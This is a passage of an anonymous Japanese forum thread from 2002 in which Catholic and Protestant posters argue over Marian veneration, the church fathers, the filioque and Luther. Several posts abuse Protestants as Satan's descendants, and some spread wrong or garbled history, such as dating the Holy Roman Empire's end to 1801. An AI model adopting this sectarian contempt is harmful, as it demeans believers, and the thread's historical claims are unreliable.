私にも八つ当たりするとはね。ホント哀れ。

702 :名無しさん@1周年:02/12/10 11:53
ムキになるところを見ると
やはりシスター・ブリージだな。ホント哀れ。

703 :名無しさん@1周年:02/12/10 12:03
>>699>和解しなさい。
>>701>論破されたからって・・・ホント哀れ。

この言いまわしと高飛車な態度、シスター・ブリージそのもの。
間違いない。

704 :名無しさん@1周年:02/12/10 12:16
カトリックのマリア崇敬に最も反対している教派の1つに、
アドベンチストがある。彼らの教祖で女預言者のEGホワイトは、
イエスに実の兄弟姉妹が何人もいたと、その著作の中で何度もかいている。
これは、初代教父の証言からも、プロの創始者4人の証言からも、
虚偽ということになる。セブンスデーアドベンチストも偽証の教団だ。

705 :名無しさん@1周年:02/12/10 12:21
プロの創始者4人

どうせそいつら、カトリック出身だろ
それなら間違ったこといってても不思議じゃないよ

706 :名無しさん@1周年:02/12/10 12:24
>>705
ヨハネの同僚のイレナエオスは?初代教父は?w

707 :マルタ ◆JKiO8VJvj2 :02/12/10 13:24
>>703
残念でしたね。
このスレッドを検索してみましたが「ホント哀れ」っていう文句を使ったのは、
私だけでしたよ。仮に、私がブリージさんだとしたら何か文句があるの?
文句があるなら逃げてないで、彼女に対するまともな反論をしてみたらどうよ。

708 :名無しさん@1周年:02/12/10 13:41
>>706いれないオスは残念ながら、ヨハネの同僚じゃねーよ。年代をよく見ろ。バカ

709 :名無しさん@1周年:02/12/10 13:44
>>707
ひつこいよ。このひつこさはブリージそのもの!
「残念でしたね」の言葉遣いがその証拠。確定だね。

710 :名無しさん@1周年:02/12/10 14:21
>>628
互いに遅レスでスマソだけど・・。

ヘブライの「聖句」にご質問の点の答えはあるみたい。

それによると、罪の捧げものは御子による犠牲によってその役目を終えた。

そのことを以前の崇拝の中心地に住む信者に納得させる(あと、エルサレムが保護されてはいないことを解らせる)ために書いた手紙だ。

その人が、コロサイでは自らの贖罪なるものに言及して自分自身の信条を覆すだろうか?しかも、当のコロサイがヘブライ書と同じ事を教調してる。

この点、イエズスの母は自分の罪の捧げものを果たしに神殿に行ったのだが・・・。

711 :シスター・ブリージ:02/12/10 14:47
あたしはマルタさんではありません。

聖伝は、聖書の起源を正しく証言しています。プロは耳を傾けましょう。
ルカ福音書とヨハネ福音書とヨハネ黙示録はキリストからの直接啓示書。

聖パピアス(60-130)ヒエラポリス司教
「そして、長老はこのように言った。ペテロの通訳、マルコは、主の言行
について記憶しているものを正しく筆記したが、順序立ててではなかった。
というのも、彼は主ご自身から聞いたわけでも、主に同行したわけでも
なかったからである。だが、私が言ったように、ペテロから後にきいたの
である。ペテロはその教えを聞き手の必要に合わせた。それで、マルコは
覚えている限りのことを間違いなく書き下ろした。自分のきいたことを
一つも除外したくなかったし、虚偽を含めたくなかったからである。
マタイについて言えば、彼はヘブライ語の言行録を作り最善に翻訳した」
(Guignebert, Jesus: p39 Schonfield, The Passover Plot:p230-1

712 :シスター・ブリージ:02/12/10 14:47
聖イレナエウス(180年)リヨン司教
「マタイは、ペテロとパウロがローマで福音をとき、そこで教会を築いて
いる間に、福音書をヘブライ人の間で彼らの原語で出版した。彼らが
去ってから、ペテロの弟子で通訳者であったマルコが、ペテロの説教の
核心部を書いて、私たちに与えた。パウロに従ったルカは、師がといた
福音を本に書き下ろした。次に、主の弟子で、主の胸に寄り添っていた
ヨハネが、アジアのエペソで生活していた時に、福音書を自ら執筆した」
McDowell, More Than a Carpenter: p64

713 :シスター・ブリージ:02/12/10 14:47
ヨハネの黙示録は96年頃に書かれました。
聖イレナエオス(180年)
「反キリストの名前について積極的に発言する危険をあえておかすまい。
というのも、その名前が今の時代に明示される必要があれば、黙示録の
幻を見た本人によって告げられていたはずであるから。その幻が見られ
てからそれほどは経っていない。私たちの時代に迫る、ドミティアヌス
の治世の末近くに見られたからである」
Against Heresies (A.D. 180-199), Book V, Chapter 30

ヒッポリトスAD 236
「アジアにいたヨハネは、ドミティアヌス王によって、パトモス島に
追放された。彼はそこで福音書を書き、黙示録の幻を見た。そして、
トラヤヌスの時代にエペソで永眠した。捜しても亡骸は見つからなかった」
Hippolytis, in chapter one, verse 3 of On the Twelve Apostles

714 :シスター・ブリージ:02/12/10 14:48
教父による福音書の成立の順番と中身:まとめ

1、マタイ:マタイはペテロとパウロの宣教中に
最初に福音書をヘブライ語で出版した。
2、マルコ:マルコはキリストに同行した経験がなかったので、
ペテロから聞かされたことを後でまとめた。
3、ルカ:ルカは師匠のパウロから聞かされた福音を本にした。
4、ヨハネ:イエスの身近にいたヨハネだけが、
主から直接見聞きしたことを福音書にしたたためた。
5、ヨハネ黙示録:96年までに、使徒ヨハネがパトモスで執筆

715 :シスター・ブリージ:02/12/10 15:01
イエレナイオスはさらに、マリアについてこう書きました。

「マリアは新らしいエヴァ」

「エヴァは死をもたらし、マリアはいのちをもたらした」

「神がキリストを通して新しく始めた新人類の母」

プロは教父の言葉に耳を傾けましょう。聖伝を大切にしましょう。
マリア様を大切にしましょう。

716 :名無しさん@1周年:02/12/10 15:17
>>プロの諸君へ

キリストの使徒と同時代に生き、勇敢に異端と戦い、
命を捨ててまで教会を守り抜き、
後の世代へ引き継いでくれた教父たちの聖書解釈を
全部無視して、自分たちの新解釈に差し替えるなんざ、
泥棒のやることだよ。恥知らず。
お前達の先駆者のほうがよほど使徒に近かったよ。
今はどうだ?先駆者の言葉さえ無視して、
母教会を執拗に陥れようとしている。
どういう積もりなんだ?
人でなしの集団よ!忘恩の徒よ!懺悔しろ!

717 :名無しさん@1周年:02/12/10 15:21
カトリックのマリア崇敬に最も反対している教派の1つに、
アドベンチストがある。彼らの教祖で女預言者のEGホワイトは、
イエスに実の兄弟姉妹が何人もいたと著作で何度もかいている。
これは、初代教父の証言からも、プロの創始者の証からも、
虚偽ということになる。セブンスデーアドベンチストも
偽証の凶弾だ。


718 :名無しさん@1周年:02/12/10 15:26
宗教改革指導者がマリアの終生処女説、無原罪懐胎を信じて
疑わなかったというのは非常に興味深い点である。
すなわち、マリアにおいてこそ、カトリックと、プロ、正教は、
この地上において初めて和解できるということになる。
非常に興味深い点である。

719 :名無しさん@1周年:02/12/10 15:28
マリアを通してきりストへ。これがカトリックの伝統的教え。
やはり正しかったんだね。

720 :名無しさん@1周年:02/12/10 15:57
>>710
>互いに遅レスでスマソだけど・・。
いえいえ。

>ヘブライの「聖句」にご質問の点の答えはあるみたい。

>それによると、罪の捧げものは御子による犠牲によってその役目を終えた。
キリストの犠牲は、確かに完結したものです。しかし、実際にはキリストの犠牲を知らない、
もしくは神との和解が成就していない人たちもいます。
>そのことを以前の崇拝の中心地に住む信者に納得させる(あと、エルサレムが保護されてはいないことを解らせる)ために書いた手紙だ。
確かにそういう意味での犠牲は成就しています。
>その人が、コロサイでは自らの贖罪なるものに言及して自分自身の信条を覆すだろうか?しかも、当のコロサイがヘブライ書と同じ事を教調してる。
コロサイ 1:24 直前の記述を見れば、殊に教会の成長や宣教のことについて述べられています。
キリストの犠牲はパウロ自身の神との和解のために購われたのは事実です。
しかし、そういう購われたパウロはその感謝と喜びをもって、
今度はキリストの神秘体である教会の苦しみにおいて欠けているところに自ら身を置き、
いまだ神との和解が成就していな人たちのために購おうとされているわけです。
彼もローマで殉教した一人です。キリストの購いとは意味が異なるとはいえ、
私たちにはなかなか真似のしがたい犠牲だと思います。
キリストの購いだけでよければ、新約聖書も福音書だけ完結していたことでしょう。
しかし、使徒言行録や教会への手紙と続くことは、後の使徒の購いも重要であったということです。
そして私たちは今日の教会に与ることができたわけです。
彼らの購いにも感謝しても損はないと思います。

>この点、イエズスの母は自分の罪の捧げものを果たしに神殿に行ったのだが・・・。
具体的にどの聖書個所を言っておられるのかを説明してください。

721 :名無しさん@1周年:02/12/10 16:52
>>710
そういうのも、初代教父がすべてこたえてるわけ。
いい加減に視的解釈の上塗りはやめれ。

722 :名無しさん@1周年:02/12/10 16:55
視的解釈→私的解釈

723 :名無しさん@1周年:02/12/10 16:56
ブリージ姐さん。また、教父の文献から、引用してくれな。

724 :名無しさん@1周年:02/12/10 17:27
ルカ1:28
マリアを、プロテスタントの聖書では、「恵まれた方」と訳してるけど、
カトリックでは「聖寵みちみてる」(full of grace)だね。
graceは神の恩寵。しかもそれが「みちみちている」わけ。
「恵まれた人」なら沢山いるよ。なんで、こんなキモイ訳しかたしたんだろうね。
悪意を感じるね。


725 :名無しさん@1周年:02/12/10 17:30
んだんだ

726 :名無しさん@1周年:02/12/10 17:31
725>>
東北の人カッコ悪


727 :名無しさん@1周年:02/12/10 17:31
マリアを何とかなきものにしよって腹だべ

728 :名無しさん@1周年:02/12/10 17:32
>>726
東北人をバカにするでねえ

729 :名無しさん@1周年:02/12/10 17:36
だいたいよ。マリア様は神様のおっかさんだべ。そんけいせんでええわけねえべ

730 :名無しさん@1周年:02/12/10 17:39
あったりめえだ。
マリア様は神のおっかさんっちゅうのは、
クリスチャンのコモンセンスだべ。

731 :名無しさん@1周年:02/12/10 17:48
昔メルキゼデクというのがいた。
『履歴なし、父母なし。系図なし』とかかれてる。
どこからともなく来て、どこへともなく消えちまった謎の人。
ただ1つわかってるのは、アブラハムにミサを授けたってこと。
多分、天使だと思うけど。
キリストだって、こういうふうに現れようと思えばできたんだ。
が、わざわざ、マリアを母として生まれることを神は決めたわけさ。
神はマリアを最初から用意されていたのさ。「女の末が蛇を砕く。」


732 :名無しさん@1周年:02/12/10 17:49
ンダンダ

733 :名無しさん@1周年:02/12/10 17:53
人間の父母を敬おう。神の子の父母はもっと敬おう。

734 :名無しさん@1周年:02/12/10 18:00
>>724
欽定では highly favored とても恵まれた
カトでは full of grace 聖寵満ち満てる


735 :名無しさん@1周年:02/12/10 18:02
訳語でずいぶん変わるね。

736 :名無しさん@1周年:02/12/10 18:06
>>721
文脈と、整合性とそれぞれの記述時期と社会状況をちゃんと追って教父の書物を調べれば、時には“マリアさんの神格化”の歴史の参考になるな。

社会背景としては、東洋的密儀が伝統的なローマの神々よりはるかに信奉されていて、
とくに絶大な支持を第2世紀に得ていたのは母なるイシスやキュベレー、続いて(ゼウスとオシリスの融合した)セラピス、太陽神と同一視されたミスラなどだった。

とくにイシスは、キリスト教徒の言う神の贈り物(テオドルス)と同じように、
イシスの贈り物(イシドルス)という名を生み出すほどだったらしい。

737 :名無しさん@1周年:02/12/10 18:06
んだんだ

738 :名無しさん@1周年:02/12/10 18:07
>>736ソースキボーン

739 :名無しさん@1周年:02/12/10 18:08

 んだんだ

740 :名無しさん@1周年:02/12/10 18:09
>736
俺さん、ウザイよ

741 :名無しさん@1周年:02/12/10 18:12
>>736
フーン

742 :名無しさん@1周年:02/12/10 18:13
>>736
どこからのネタですか?ものみの塔?SDA?俺さんのスレッド?
リンクしないうちは英文だろうが日本文だろうが、ガセと見なします。
リンクしない限り、ネット上の匿名の書き込みは、
幾らでも嘘が書けますので、信用できません。
今後、マリアさま崇敬に反対する方も、賛成する方も、ネット上では、
証拠を必ずリンクして言ってください。

743 :名無しさん@1周年:02/12/10 18:14
>>736>>741
自作自演ウザイよ。

744 :名無しさん@1周年:02/12/10 18:16
>>736
2ちゃんに引き篭る名無し如きのよた話に何の信憑性がある
んですか?

聖伝に直に接している人が一番よく知っているでしょう…
それとも名無しで書けば、
学術的な声明になるとでもお思いでしょうか?

笑わせないでください。

745 :名無しさん@1周年:02/12/10 18:18
>>736信じてもらいたけりゃ、リンクしろよ。
匿名では幾らでも嘘が書ける。
リンクしないうちはすべてガセネタと見なす。
名無しのお前だ。疑れて当然だ。
これまでの妨害、誹謗中傷、嘘八百でうんざりしている。
リンクしろ。


746 :名無しさん@1周年:02/12/10 18:20
どうせ、俺さんのネタだろ。w

747 :名無しさん@1周年:02/12/10 18:21
何だ、嘘か....つまんね

748 :名無しさん@1周年:02/12/10 18:23


 プロは嘘吐き集団だね。
どうしても、マリアをイシスと=で結びつけたいらしい。
バカだね

749 :名無しさん@1周年:02/12/10 18:24
イシシ教団

750 :名無しさん@1周年:02/12/10 18:29
>>736
それを言うなら、イエス・キリストが神の子とされたという、聖書の神の言葉から、反証しないとだめでしょう。この事実がなかったなら、マリアが神の母とたたえられることはなかったのですから。

751 :名無しさん@1周年:02/12/10 18:32
736はバカ丸出し

752 :名無しさん@1周年:02/12/10 18:35
イエスがオシリスだと言いたいんだろ。吉村をかじったんだろ

753 :名無しさん@1周年:02/12/10 18:37
キリストの使徒と同時代に生きた教父たちの聖書解釈を全部無視して、自分たちの新解釈に差し替えるなんざ、泥棒のやることだよ。

754 :名無しさん@1周年:02/12/10 18:37
イエス・キリストは言われた。「サタンは最初から泥棒でした。」
プロはサタンです。
英語のプロテスタントとは「反対する者」。
ギリシャ語のサタンとは「反対する者」。



755 :名無しさん@1周年:02/12/10 18:37
>>742-750
グノーシス文書からなんじゃないの?

756 :名無しさん@1周年:02/12/10 18:41
>>754
プロテスタントは、「(列聖された)皇帝に抗議するもの」の意味ですが・・・。

757 :名無しさん@1周年:02/12/10 18:43
>>756同じジャん。w

758 :名無しさん@1周年:02/12/10 18:45
>>756
そうです。神聖ローマ帝国の無い現代は、プロテスタントの存在価値は無いの。
ルターでさえ、イスラム教と手を組んでまで戦った相手は神聖ローマ帝国でした。
今はきっと天国でルターは講義なんてしてないと思うよ。

759 :名無しさん@1周年:02/12/10 18:47
>>758
そらあ、ほんまか?

760 :マルタ ◆JKiO8VJvj2 :02/12/10 18:48
俺さん。神聖ローマ帝国はもうありません。
抗議のやり場が無いからって、糞スレ立てるんじゃありませんよ。

761 :マルタ ◆JKiO8VJvj2 :02/12/10 18:52
>>759
本当です。フランスが神聖ローマ帝国を滅ぼそうとして、
ルターやイスラム教とも同盟をつくりました。
ルターは、神聖ローマ帝国を滅すためなら、
イスラム教と手を組むことを大いに賛成したそうです。
またルター自身、イスラム教の信条を高く評価していました。

762 :名無しさん@1周年:02/12/10 18:53
プロテスタントは悪魔の子孫!
悪魔は偽りの父である。嘘ばっか言うプロは悪魔の子孫だ。


763 :名無しさん@1周年:02/12/10 18:57
あの、イスラム教では、マリアさまはイエス様より格が上だけど…。
どう説明するの。マルタお嬢様、答えて!!>>761

764 :名無しさん@1周年:02/12/10 18:58
お嬢様?マルタはお嬢さんだったの?

765 :名無しさん@1周年:02/12/10 18:59
マルタさんはどうして、俺さんと離別したの?それもおせ―て!前は仲良かったじゃん

766 :マルタ ◆JKiO8VJvj2 :02/12/10 19:00
>>763
詳しくは知りませんが、そのとおりかもしれませんね。
コーランの中では、イエス様は神(アッラー)の子であることを否定されていますから。

767 :名無しさん@1周年:02/12/10 19:00
マルタさん、マンセー!

768 :763:02/12/10 19:02
マルタお嬢様。有難う。コーランのことと、マホメットの娘のファチマさんのことと、ファチマでの聖母とどう関係するんでしょう。

769 :マルタ ◆JKiO8VJvj2 :02/12/10 19:02
>>765
すみません。私は元祖マルタさんではありません。
http://life.2ch.net/test/read.cgi/psy/1035019319/112
を参照してください。

770 :名無しさん@1周年:02/12/10 19:03
>>766

マルタさんはどうして、俺さんと離別したの?
それもおせ―て!前は仲良かったじゃん

771 :名無しさん@1周年:02/12/10 19:06
>769え?ちがう人?なんだ・

772 :名無しさん@1周年:02/12/10 19:09

ふーん。プロはマリアを大じにするイスラム教徒と手を組んだのか。
皮肉だね。w


773 :名無しさん@1周年:02/12/10 19:12
>>772
政治的なものだったからね、どこでも良かったんだろうよ。くだらん。宗教改革が聞いて飽きれるさ。ただの美名だよ。w

774 :名無しさん@1周年:02/12/10 19:18
イスラム教と結託して、次はフリーメーソンか。恥知らずだな。

775 :名無しさん@1周年:02/12/10 19:19
>>773
ルターの宗教改革の動機は信仰ではない、という事?

776 :名無しさん@1周年:02/12/10 19:22
ルターって、エラスムスみたいな人文主義者に近い印象があるね。

777 :マルタ ◆JKiO8VJvj2 :02/12/10 19:24
>>775
ルター自身はあったかもしれない。
しかし、彼を支持したのは福音主義には殆ど興味がなかったのが実際だったでしょうね。

778 :名無しさん@1周年:02/12/10 19:27
ルターはね、神聖ローマ帝国をつぶそうとしてイスラム教とてをくんだ。
ルターの試みが実ったのは19世紀末だよ。1798年にフランス革命でフランスの王制は滅亡し、1801年に、お願いかなって神聖ローマは滅亡した。フリメ天国の到来さ。


779 :名無しさん@1周年:02/12/10 19:50
サイテーだな。プロ

780 :名無しさん@1周年:02/12/10 19:51
革命のときは、プロは欣喜雀躍したろうな。
一夜で三千人の修道士、修道女が首を撥ねられたんだからな w

781 :名無しさん@1周年:02/12/10 19:52
ルターは地獄でよろこんだと思いまふ。>>780

782 :名無しさん@1周年:02/12/10 19:55
・・・ってか、1はネタじゃないの?


783 :名無しさん@1周年:02/12/10 20:02
>>782うまく逃げたな。w

784 :夜の散歩:02/12/10 20:09
前に道路交通法を例えましたが、言いかえれば、
カトリックは田舎道、プロテスタントは舗装道路とも言えるでしょう。
舗装道路には利点もマイナス点もあります。田舎道もそうでしょう。
仲良くしましょう

785 :名無しさん@1周年:02/12/10 20:11
カトリックは本家、すなわち本道。
プロテスタントは分家、すなわちあぜ道。
これ常識。

786 :名無しさん@1周年:02/12/10 20:16
公教は本道、正教は間道、新教は畦道。

787 :名無しさん@1周年:02/12/10 20:17
公教は本道、正教は間道、新教は畦道、福音派は獣道。


788 :マリア:02/12/10 23:35
あらあら、お久しぶり。またやってるのね。
この問題に関しては、キリスト教の歴史を振り返るべきでしょう。
それぞれの信仰のあり方に縛られて、過去を的確に見つめ直す気がない限り、
何故、カトリック教会が様々な教義を作り上げてきたのか?
そんなことは到底理解することは出来ないものよ。
これはカトリック信徒を含むクリスチャンに共通してそうであるでしょう。

神は何故、唯一三位一体でなければならないのか?
聖書が何故聖書なのか?
聖伝承は何故終わりの時まで発展していくのか?
また、聖人は何故必要であったのか?
イエズスの母マリアが何故、神の母でなければならないのか?
こういった位置付けがどうして必要であったのか?
何故、マリアは無原罪でなければならないのか?
これらは全て、イエズスが何故真の神・真の人なければならないのか?
こういった位置付けがどうして必要であったのか?
という問題に関わってくるわけなの。

そして、カトリック教会が今度は聖母マリアを
共贖者としようとするのか?
そして、その意味とは?
このような意味も理解できるようになるでしょうね。

カトリック教会は、常に正しくなければならない。
なぜならば、それは神の教会だからよ。
そのために、教義・聖書・その他諸々の定義を示してきたわけなの。
異教や人の作り出した思想や定義に常に勝利するための法則なのよ。

聖書が正しいのはなぜか?
それはプロテスタント諸教派が一番分かっていて、
一番分かっていないのね。
カトリックやオーソドックスには、その答えがあるんだけどね。

789 :マリア:02/12/10 23:47
>>784残念ながら、舗装道路はカトリックやオーソドックスよ。
プロテスタントは、アスファルトやセメントの舗装を、
必要ないといって剥ぎ取ったのよ。
しかし、その道は自然に出来た田舎道でもない。
一見自然に戻したかに見えるけど、実は全く違うわけ。

仲良く?仲良くしようと思うなら、
相手のことを的確に理解しなければならない。
それがキリスト教的な前提。
的確に理解する気がないなら、自分達の正しさを分析し、主張し、
対話する方が、より深い議論ができるというものよ。
少なくともキリスト教徒であるなら、そうすべきよ。
古代教会の者達は、そうやって正しい教義を手に入れてきたのよ。

790 :マリア:02/12/10 23:58
あら、訂正。
>>789的確に理解する気がないなら、自分達の正しさを分析し、主張し、
対話する方が、
につづけて
>それと他の主張と比較するのよ。
を加えてちょうだい。

791 :マルタ ◆JKiO8VJvj2 :02/12/11 00:07
マリアさん凄い久しぶり。

792 :マリア:02/12/11 00:14
>>791あら、お元気かしら?

793 :マリア:02/12/11 00:23
まぁ、相変わらずあたしのレスは、
他の人から見ればトンデモだろうけど、
キリスト教を最初から見つめてきた母の先祖達の
遺志を重んずるなら、あたしとしてはこういう結論になるわけよ。

これは、後からの推測でも、宗教的理想を加味したものではない。
生きて聖霊の導きのまま、主を証していった先人達の重みを、
今生きるキリスト者達はきちんと理解して欲しいわ。

なぜ、カトリック教会がこのような歩みをしたのか。
それが何故正しいとされたのか?
こういったことをしっかりと調べて見るのも悪くはないはずよ。

794 :マルタ ◆JKiO8VJvj2 :02/12/11 00:45
>>792-793
ごめん、わたしは元祖マルタではないんです。
http://life.2ch.net/test/read.cgi/psy/1035019319/112
はじめまして、よろしく。

795 :朝の散歩:02/12/11 09:31
なんだか知らないが、我輩の偽者が跳梁跋扈しておるな。
もっとも、これも2ちゃんの醍醐味の一つ。
偽者の我輩の健闘を祈ろう。

796 :名無しさん@1周年:02/12/11 10:47
>>795
言い負かされると誤魔化して逃げるのも、おまいらプロの醍醐味のひとつ。
前からロムしてるけど、おまえホントに逃げるのうまいよな。w

797 :名無しさん@1周年:02/12/11 10:49
>>795>偽者の我輩の健闘を祈ろう。

おまえ自身だろうが、多重人格のようだな。俺さんと同じだ。w


798 :名無しさん@1周年:02/12/11 10:50
ナンダ、夜の散歩は、ヤパーリ朝の散歩か..........


799 :名無しさん@1周年:02/12/11 10:53
>>798
そうそう。言い負かされて都合が悪くなると
偽もののせいにする。やり方がセコイ。
セコ過ぎる。

800 :名無しさん@1周年:02/12/11 10:56
てゆうかさあ、散歩のやつ、最初から、言い負かされぱなしじゃない?




801 :名無しさん@1周年:02/12/11 11:10
んだんだ

802 :名無しさん@1周年:02/12/11 11:13
要するに、マリアは共同贖罪者。これでOKね?
ハイ!プロの負け。

803 :昼の散歩:02/12/11 11:27
ワハハハハ!こいつは愉快だな。
「散歩」は何人もいるようだぞ。
言い負かされている散歩もいるし、言い負かされてない散歩もいるし。
こうなってくると、偽者だの本物だのというのは、意味がないな。
名無しさんと同じだ。
これこそ、2ちゃんの面白いところだ。
諸君、大いに楽しもうではないか。

804 :名無しさん@1周年:02/12/11 11:34
>>803
誤魔化したって、だめだよ。あなたは最初から言い負かされてるんだから。w出直してきな。

805 :昼の散歩:02/12/11 11:37
>>804
はて?
少なくともこの「散歩」は言い負かされた覚えはないけどな??(・。・)

この散歩が言い負かされているのは、どのレスでつか?(・。・)

806 :名無しさん@1周年:02/12/11 11:38
>>803土台、2000年の歴史をもつカトリックにかとうだなんて、100年はえんだよ。出直してこい!

807 :名無しさん@1周年:02/12/11 11:39
>>805

だーから、もう誤魔化すのは、やめれ。
見苦しいぞ、散歩。

808 :昼の散歩:02/12/11 12:05
>>806
そいつぁ歴史の流れを無視した発想だな。もういっぺん思想史を学びなおそう。
>>807
煽っているつもりかもしれないけど。。。。

809 :名無しさん@1周年:02/12/11 12:07
>>808
そいつぁ教父を無視した発想だな。
もういっぺん教父を学びなおそう。

810 :名無しさん@1周年:02/12/11 12:23
>>808そいつぁキリストがペテロにかけたお言葉を無視した発想だな。
もういっぺん聖書を学びなおそう。

マタイ16:18 ではわたしもあなたに言います。あなたはペテロです。
わたしはこの岩の上にわたしの教会を建てます。ハデスの門もそれには
打ち勝てません。
16:19 わたしは、あなたに天の御国のかぎを上げます。何でもあなたが
地上でつなぐなら、それは天においてもつながれており、あなたが地上で
解くなら、それは天においても解かれています。」
マタイ7:24 だから、わたしのこれらのことばを聞いてそれを行なう者は
みな、岩の上に自分の家を建てた賢い人に比べることができます。
7:25 雨が降って洪水が押し寄せ、風が吹いてその家に打ちつけたが、
それでも倒れませんでした。岩の上に建てられていたからです。
7:26 また、わたしのこれらのことばを聞いてそれを行なわない者はみな、
砂の上に自分の家を建てた愚かな人に比べることができます。
7:27 雨が降って洪水が押し寄せ、風が吹いてその家に打ちつけると、
倒れてしまいました。しかもそれはひどい倒れ方でした。」

811 :名無しさん@1周年:02/12/11 12:28
>>808そいつぁキリストの言葉を無視した発想だな。
もういっぺん聖書を学びなおそう。

「あなたに言います。あなたはペテロです。わたしはこの岩の上にわたし
の教会を建てます。ハデスの門もそれには打ち勝てません。わたしは、
あなたに天の御国のかぎを上げます。何でもあなたが地上でつなぐなら、
それは天においてもつながれており、あなたが地上で解くなら、それは
天においても解かれています。」(マタイ16:18、19)

「だから、わたしのこれらのことばを聞いてそれを行なう者はみな、岩の
上に自分の家を建てた賢い人に比べることができます。雨が降って洪水が
押し寄せ、風が吹いてその家に打ちつけたが、それでも倒れませんでした。
岩の上に建てられていたからです。わたしのこれらのことばを聞いてそれ
を行なわない者はみな、砂の上に自分の家を建てた愚かな人に比べること
ができます。雨が降って洪水が押し寄せ、風が吹いてその家に打ちつける
と倒れてしまいました。それはひどい倒れ方でした」(マタイ7:24‐27)

812 :名無しさん@1周年:02/12/11 12:31

散歩のヤツ、また、言い負かされちった。プ

813 :名無しさん@1周年:02/12/11 12:34
>>811なるほど、使徒継承のカトリックは、
ペテロの岩の上にたてられているから、
崩れないわけですね。そう、神様が約束されているわけですね。
プロは砂上の楼閣だから、嵐と洪水でひどく倒れるわけですね。
了解しました。

814 :名無しさん@1周年:02/12/11 12:36

散歩のヤツ、また、言い負かされてやんの。プ




815 :名無しさん@1周年:02/12/11 12:38
>>散歩

土台、2000年の歴史をもつカトリックにかとうだなんて、
100年はえんだよ。





出直してこい!


816 :名無しさん@1周年:02/12/11 12:38
>>808
新教は何かにつけ、公教と正教とのいわゆる東西分裂分裂を理由に、
自分達の分裂を正当化しようとする。では、新教は聖霊の御子からの発出を認めないのだろうか。

確かに、原二ケア信条などでは、御父と御子からとはなっていない。
しかし、東方正教会でも「カッパドキアの三教父」の聖伝は認めているはず。
「カッパドキアの三教父」の一人、ニュッサのグレゴリオスの著書「教理大講話」で、
御子を御言葉、聖霊を神の息吹として、三一論を説明する箇所がある。
「『主の御言葉によって天は造られ、主の息吹によって天 の万象はつくられた』〔詩33:6〕。いかなる御言
 葉、いかなる息吹〔霊〕なのか。」
(中世思想原典集成2 盛期ギリシア教父 平凡社)
一方福音書には、
ヨハネ福  20:22 そう言ってから、彼らに息を吹きかけて言われた。「聖霊を受けなさい。
という箇所があります。
すなわち、これが御子から聖霊が発出する根拠。
西方教会はこの伝承に基づいて、二ケア・コンスタンチノープル信条のラテン語訳に「父および子から」と加えたのです。

817 :名無しさん@1周年:02/12/11 12:46
>>816
的確な説明に感謝します。神父様

818 :名無しさん@1周年:02/12/11 12:52
>>散歩

セコイ政略結婚を理由に、カトリックから離教者した挙句、
カトリックから典礼と聖書を泥棒し、多くのイギリスのカトリックの司祭、
修道女を殺して建てた、ヘンリー八世の糞教会になんぞ、
よくもまあ、入ってられるもんだな。
どういう根性をしてるんだ?
懺悔しやがれ!

819 :名無しさん@1周年:02/12/11 12:54
>>散歩

セコイ政略結婚を理由に、カトリックから離教した挙句、
カトリックから典礼と聖書を泥棒し、多くのイギリスのカトリックの司祭、
修道女を殺して建てた、ヘンリー八世の糞教会になんぞ、
よくもまあ、入ってられるもんだな。
どういう根性をしてるんだ?
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!
懺悔しやがれ!バカ野郎!


820 :名無しさん@1周年:02/12/11 12:57
また俺さんの自作自演か・・・。情けないなぁ・・・

821 :名無しさん@1周年:02/12/11 12:57
>>プロの諸君へ

キリストの使徒と同時代に生き、勇敢に異端と戦い、
命を捨ててまで教会を守り抜き、
後の世代へ引き継いでくれた教父たちの聖書解釈を
全部無視して、自分たちの新解釈に差し替えるなんざ、
泥棒のやることだよ。恥知らず。
お前達の先駆者のほうがよほど使徒に近かったよ。
今はどうだ?先駆者の言葉さえ無視して、
母教会を執拗に陥れようとしている。
どういう積もりなんだ?
人でなしの集団よ!忘恩の徒よ!懺悔しろ!


822 :名無しさん@1周年:02/12/11 12:57
マリアに論破された腹いせなのかなぁ・・・。

823 :名無しさん@1周年:02/12/11 12:58
>>820情けないのはオマエ

824 :名無しさん@1周年:02/12/11 12:59
俺さんはマリアさん大好きだもんな。

825 :名無しさん@1周年:02/12/11 12:59
俺さんは『散歩』のヤツです。

826 :名無しさん@1周年:02/12/11 12:59
>>823おっ、俺さんが反応した。おもしれー。

827 :名無しさん@1周年:02/12/11 13:01
>>826>823おっ、俺さんが反応した。おもしれー。



とカキコしたところで、マリアが共贖者である事実は変動しねえよ。

出直して来い!

828 :名無しさん@1周年:02/12/11 14:27
>>827
馬鹿野郎!
マリヤは最初から共同贖罪者ではないし、
おまえが何を主張しても、共同贖罪者には
変身しねえんだよ。馬鹿!


829 :名無しさん@1周年:02/12/11 14:31
>>828

俺さん、ウザイよ

830 :名無しさん@1周年:02/12/11 14:34
>>829
馬鹿野郎!
マリヤは最初から共同贖罪者ではないし、
おまえが何を主張しても、共同贖罪者には
変身しねえんだよ。馬鹿!


831 :おやつ時の散歩:02/12/11 14:41
あれまあ、ほんに見苦しい・・・

まとめてレスするね。
プロテスタントは、西方教会と東方教会の分裂を理由に云々・・・ということは、ありませぬ。
プロテスタント内での分裂の理由は、教派によりそれぞれですし。

さて、もう何度も書いたことを、もう一度書きますね。
カトリックは、聖伝を大切にし、聖書と聖伝とを教理の源泉としています。
一方プロテスタントは、カルタゴ教会会議で聖典と認められた旧新約聖書66巻だけを、
教理の源泉として認めています。
もちろん、基本信条は信仰告白として受け入れています。聖書の聖典化のためには、
どの文書が正しい教理を記しているかを見分けなくてはならないわけですが、
そのためには、使徒たちが伝えた信仰を表明している信条が、大切となるからです。
そして、聖書聖典化以降は、この聖書を基準として、すべての教理を見直すわけです。

時代が変わると、教会のあり方も違ってくるのは当然でしょう。
しかしその中で、永遠不変に変わることのない福音だけを、
継承してゆかなくてはならないと思います。

御言葉によって絶えず改革され続ける教会。
プロテスタント教会にとって、これは大切なことなのです。

832 :名無しさん@1周年:02/12/11 15:00
>>831
嘘をつかないで下さい。
カルタゴ会議で聖典とされたのは、66巻ではなく、72巻ですよ。
あなたが聖伝と呼んでいる六巻が含まれている。
なぜ、嘘をつくのですか?

833 :名無しさん@1周年:02/12/11 15:00
>>831
それなら、第1バチカン公会議の教皇の使徒座の首位権と不可謬性を認めたら。
教会の分裂がなくなってせいせいします。

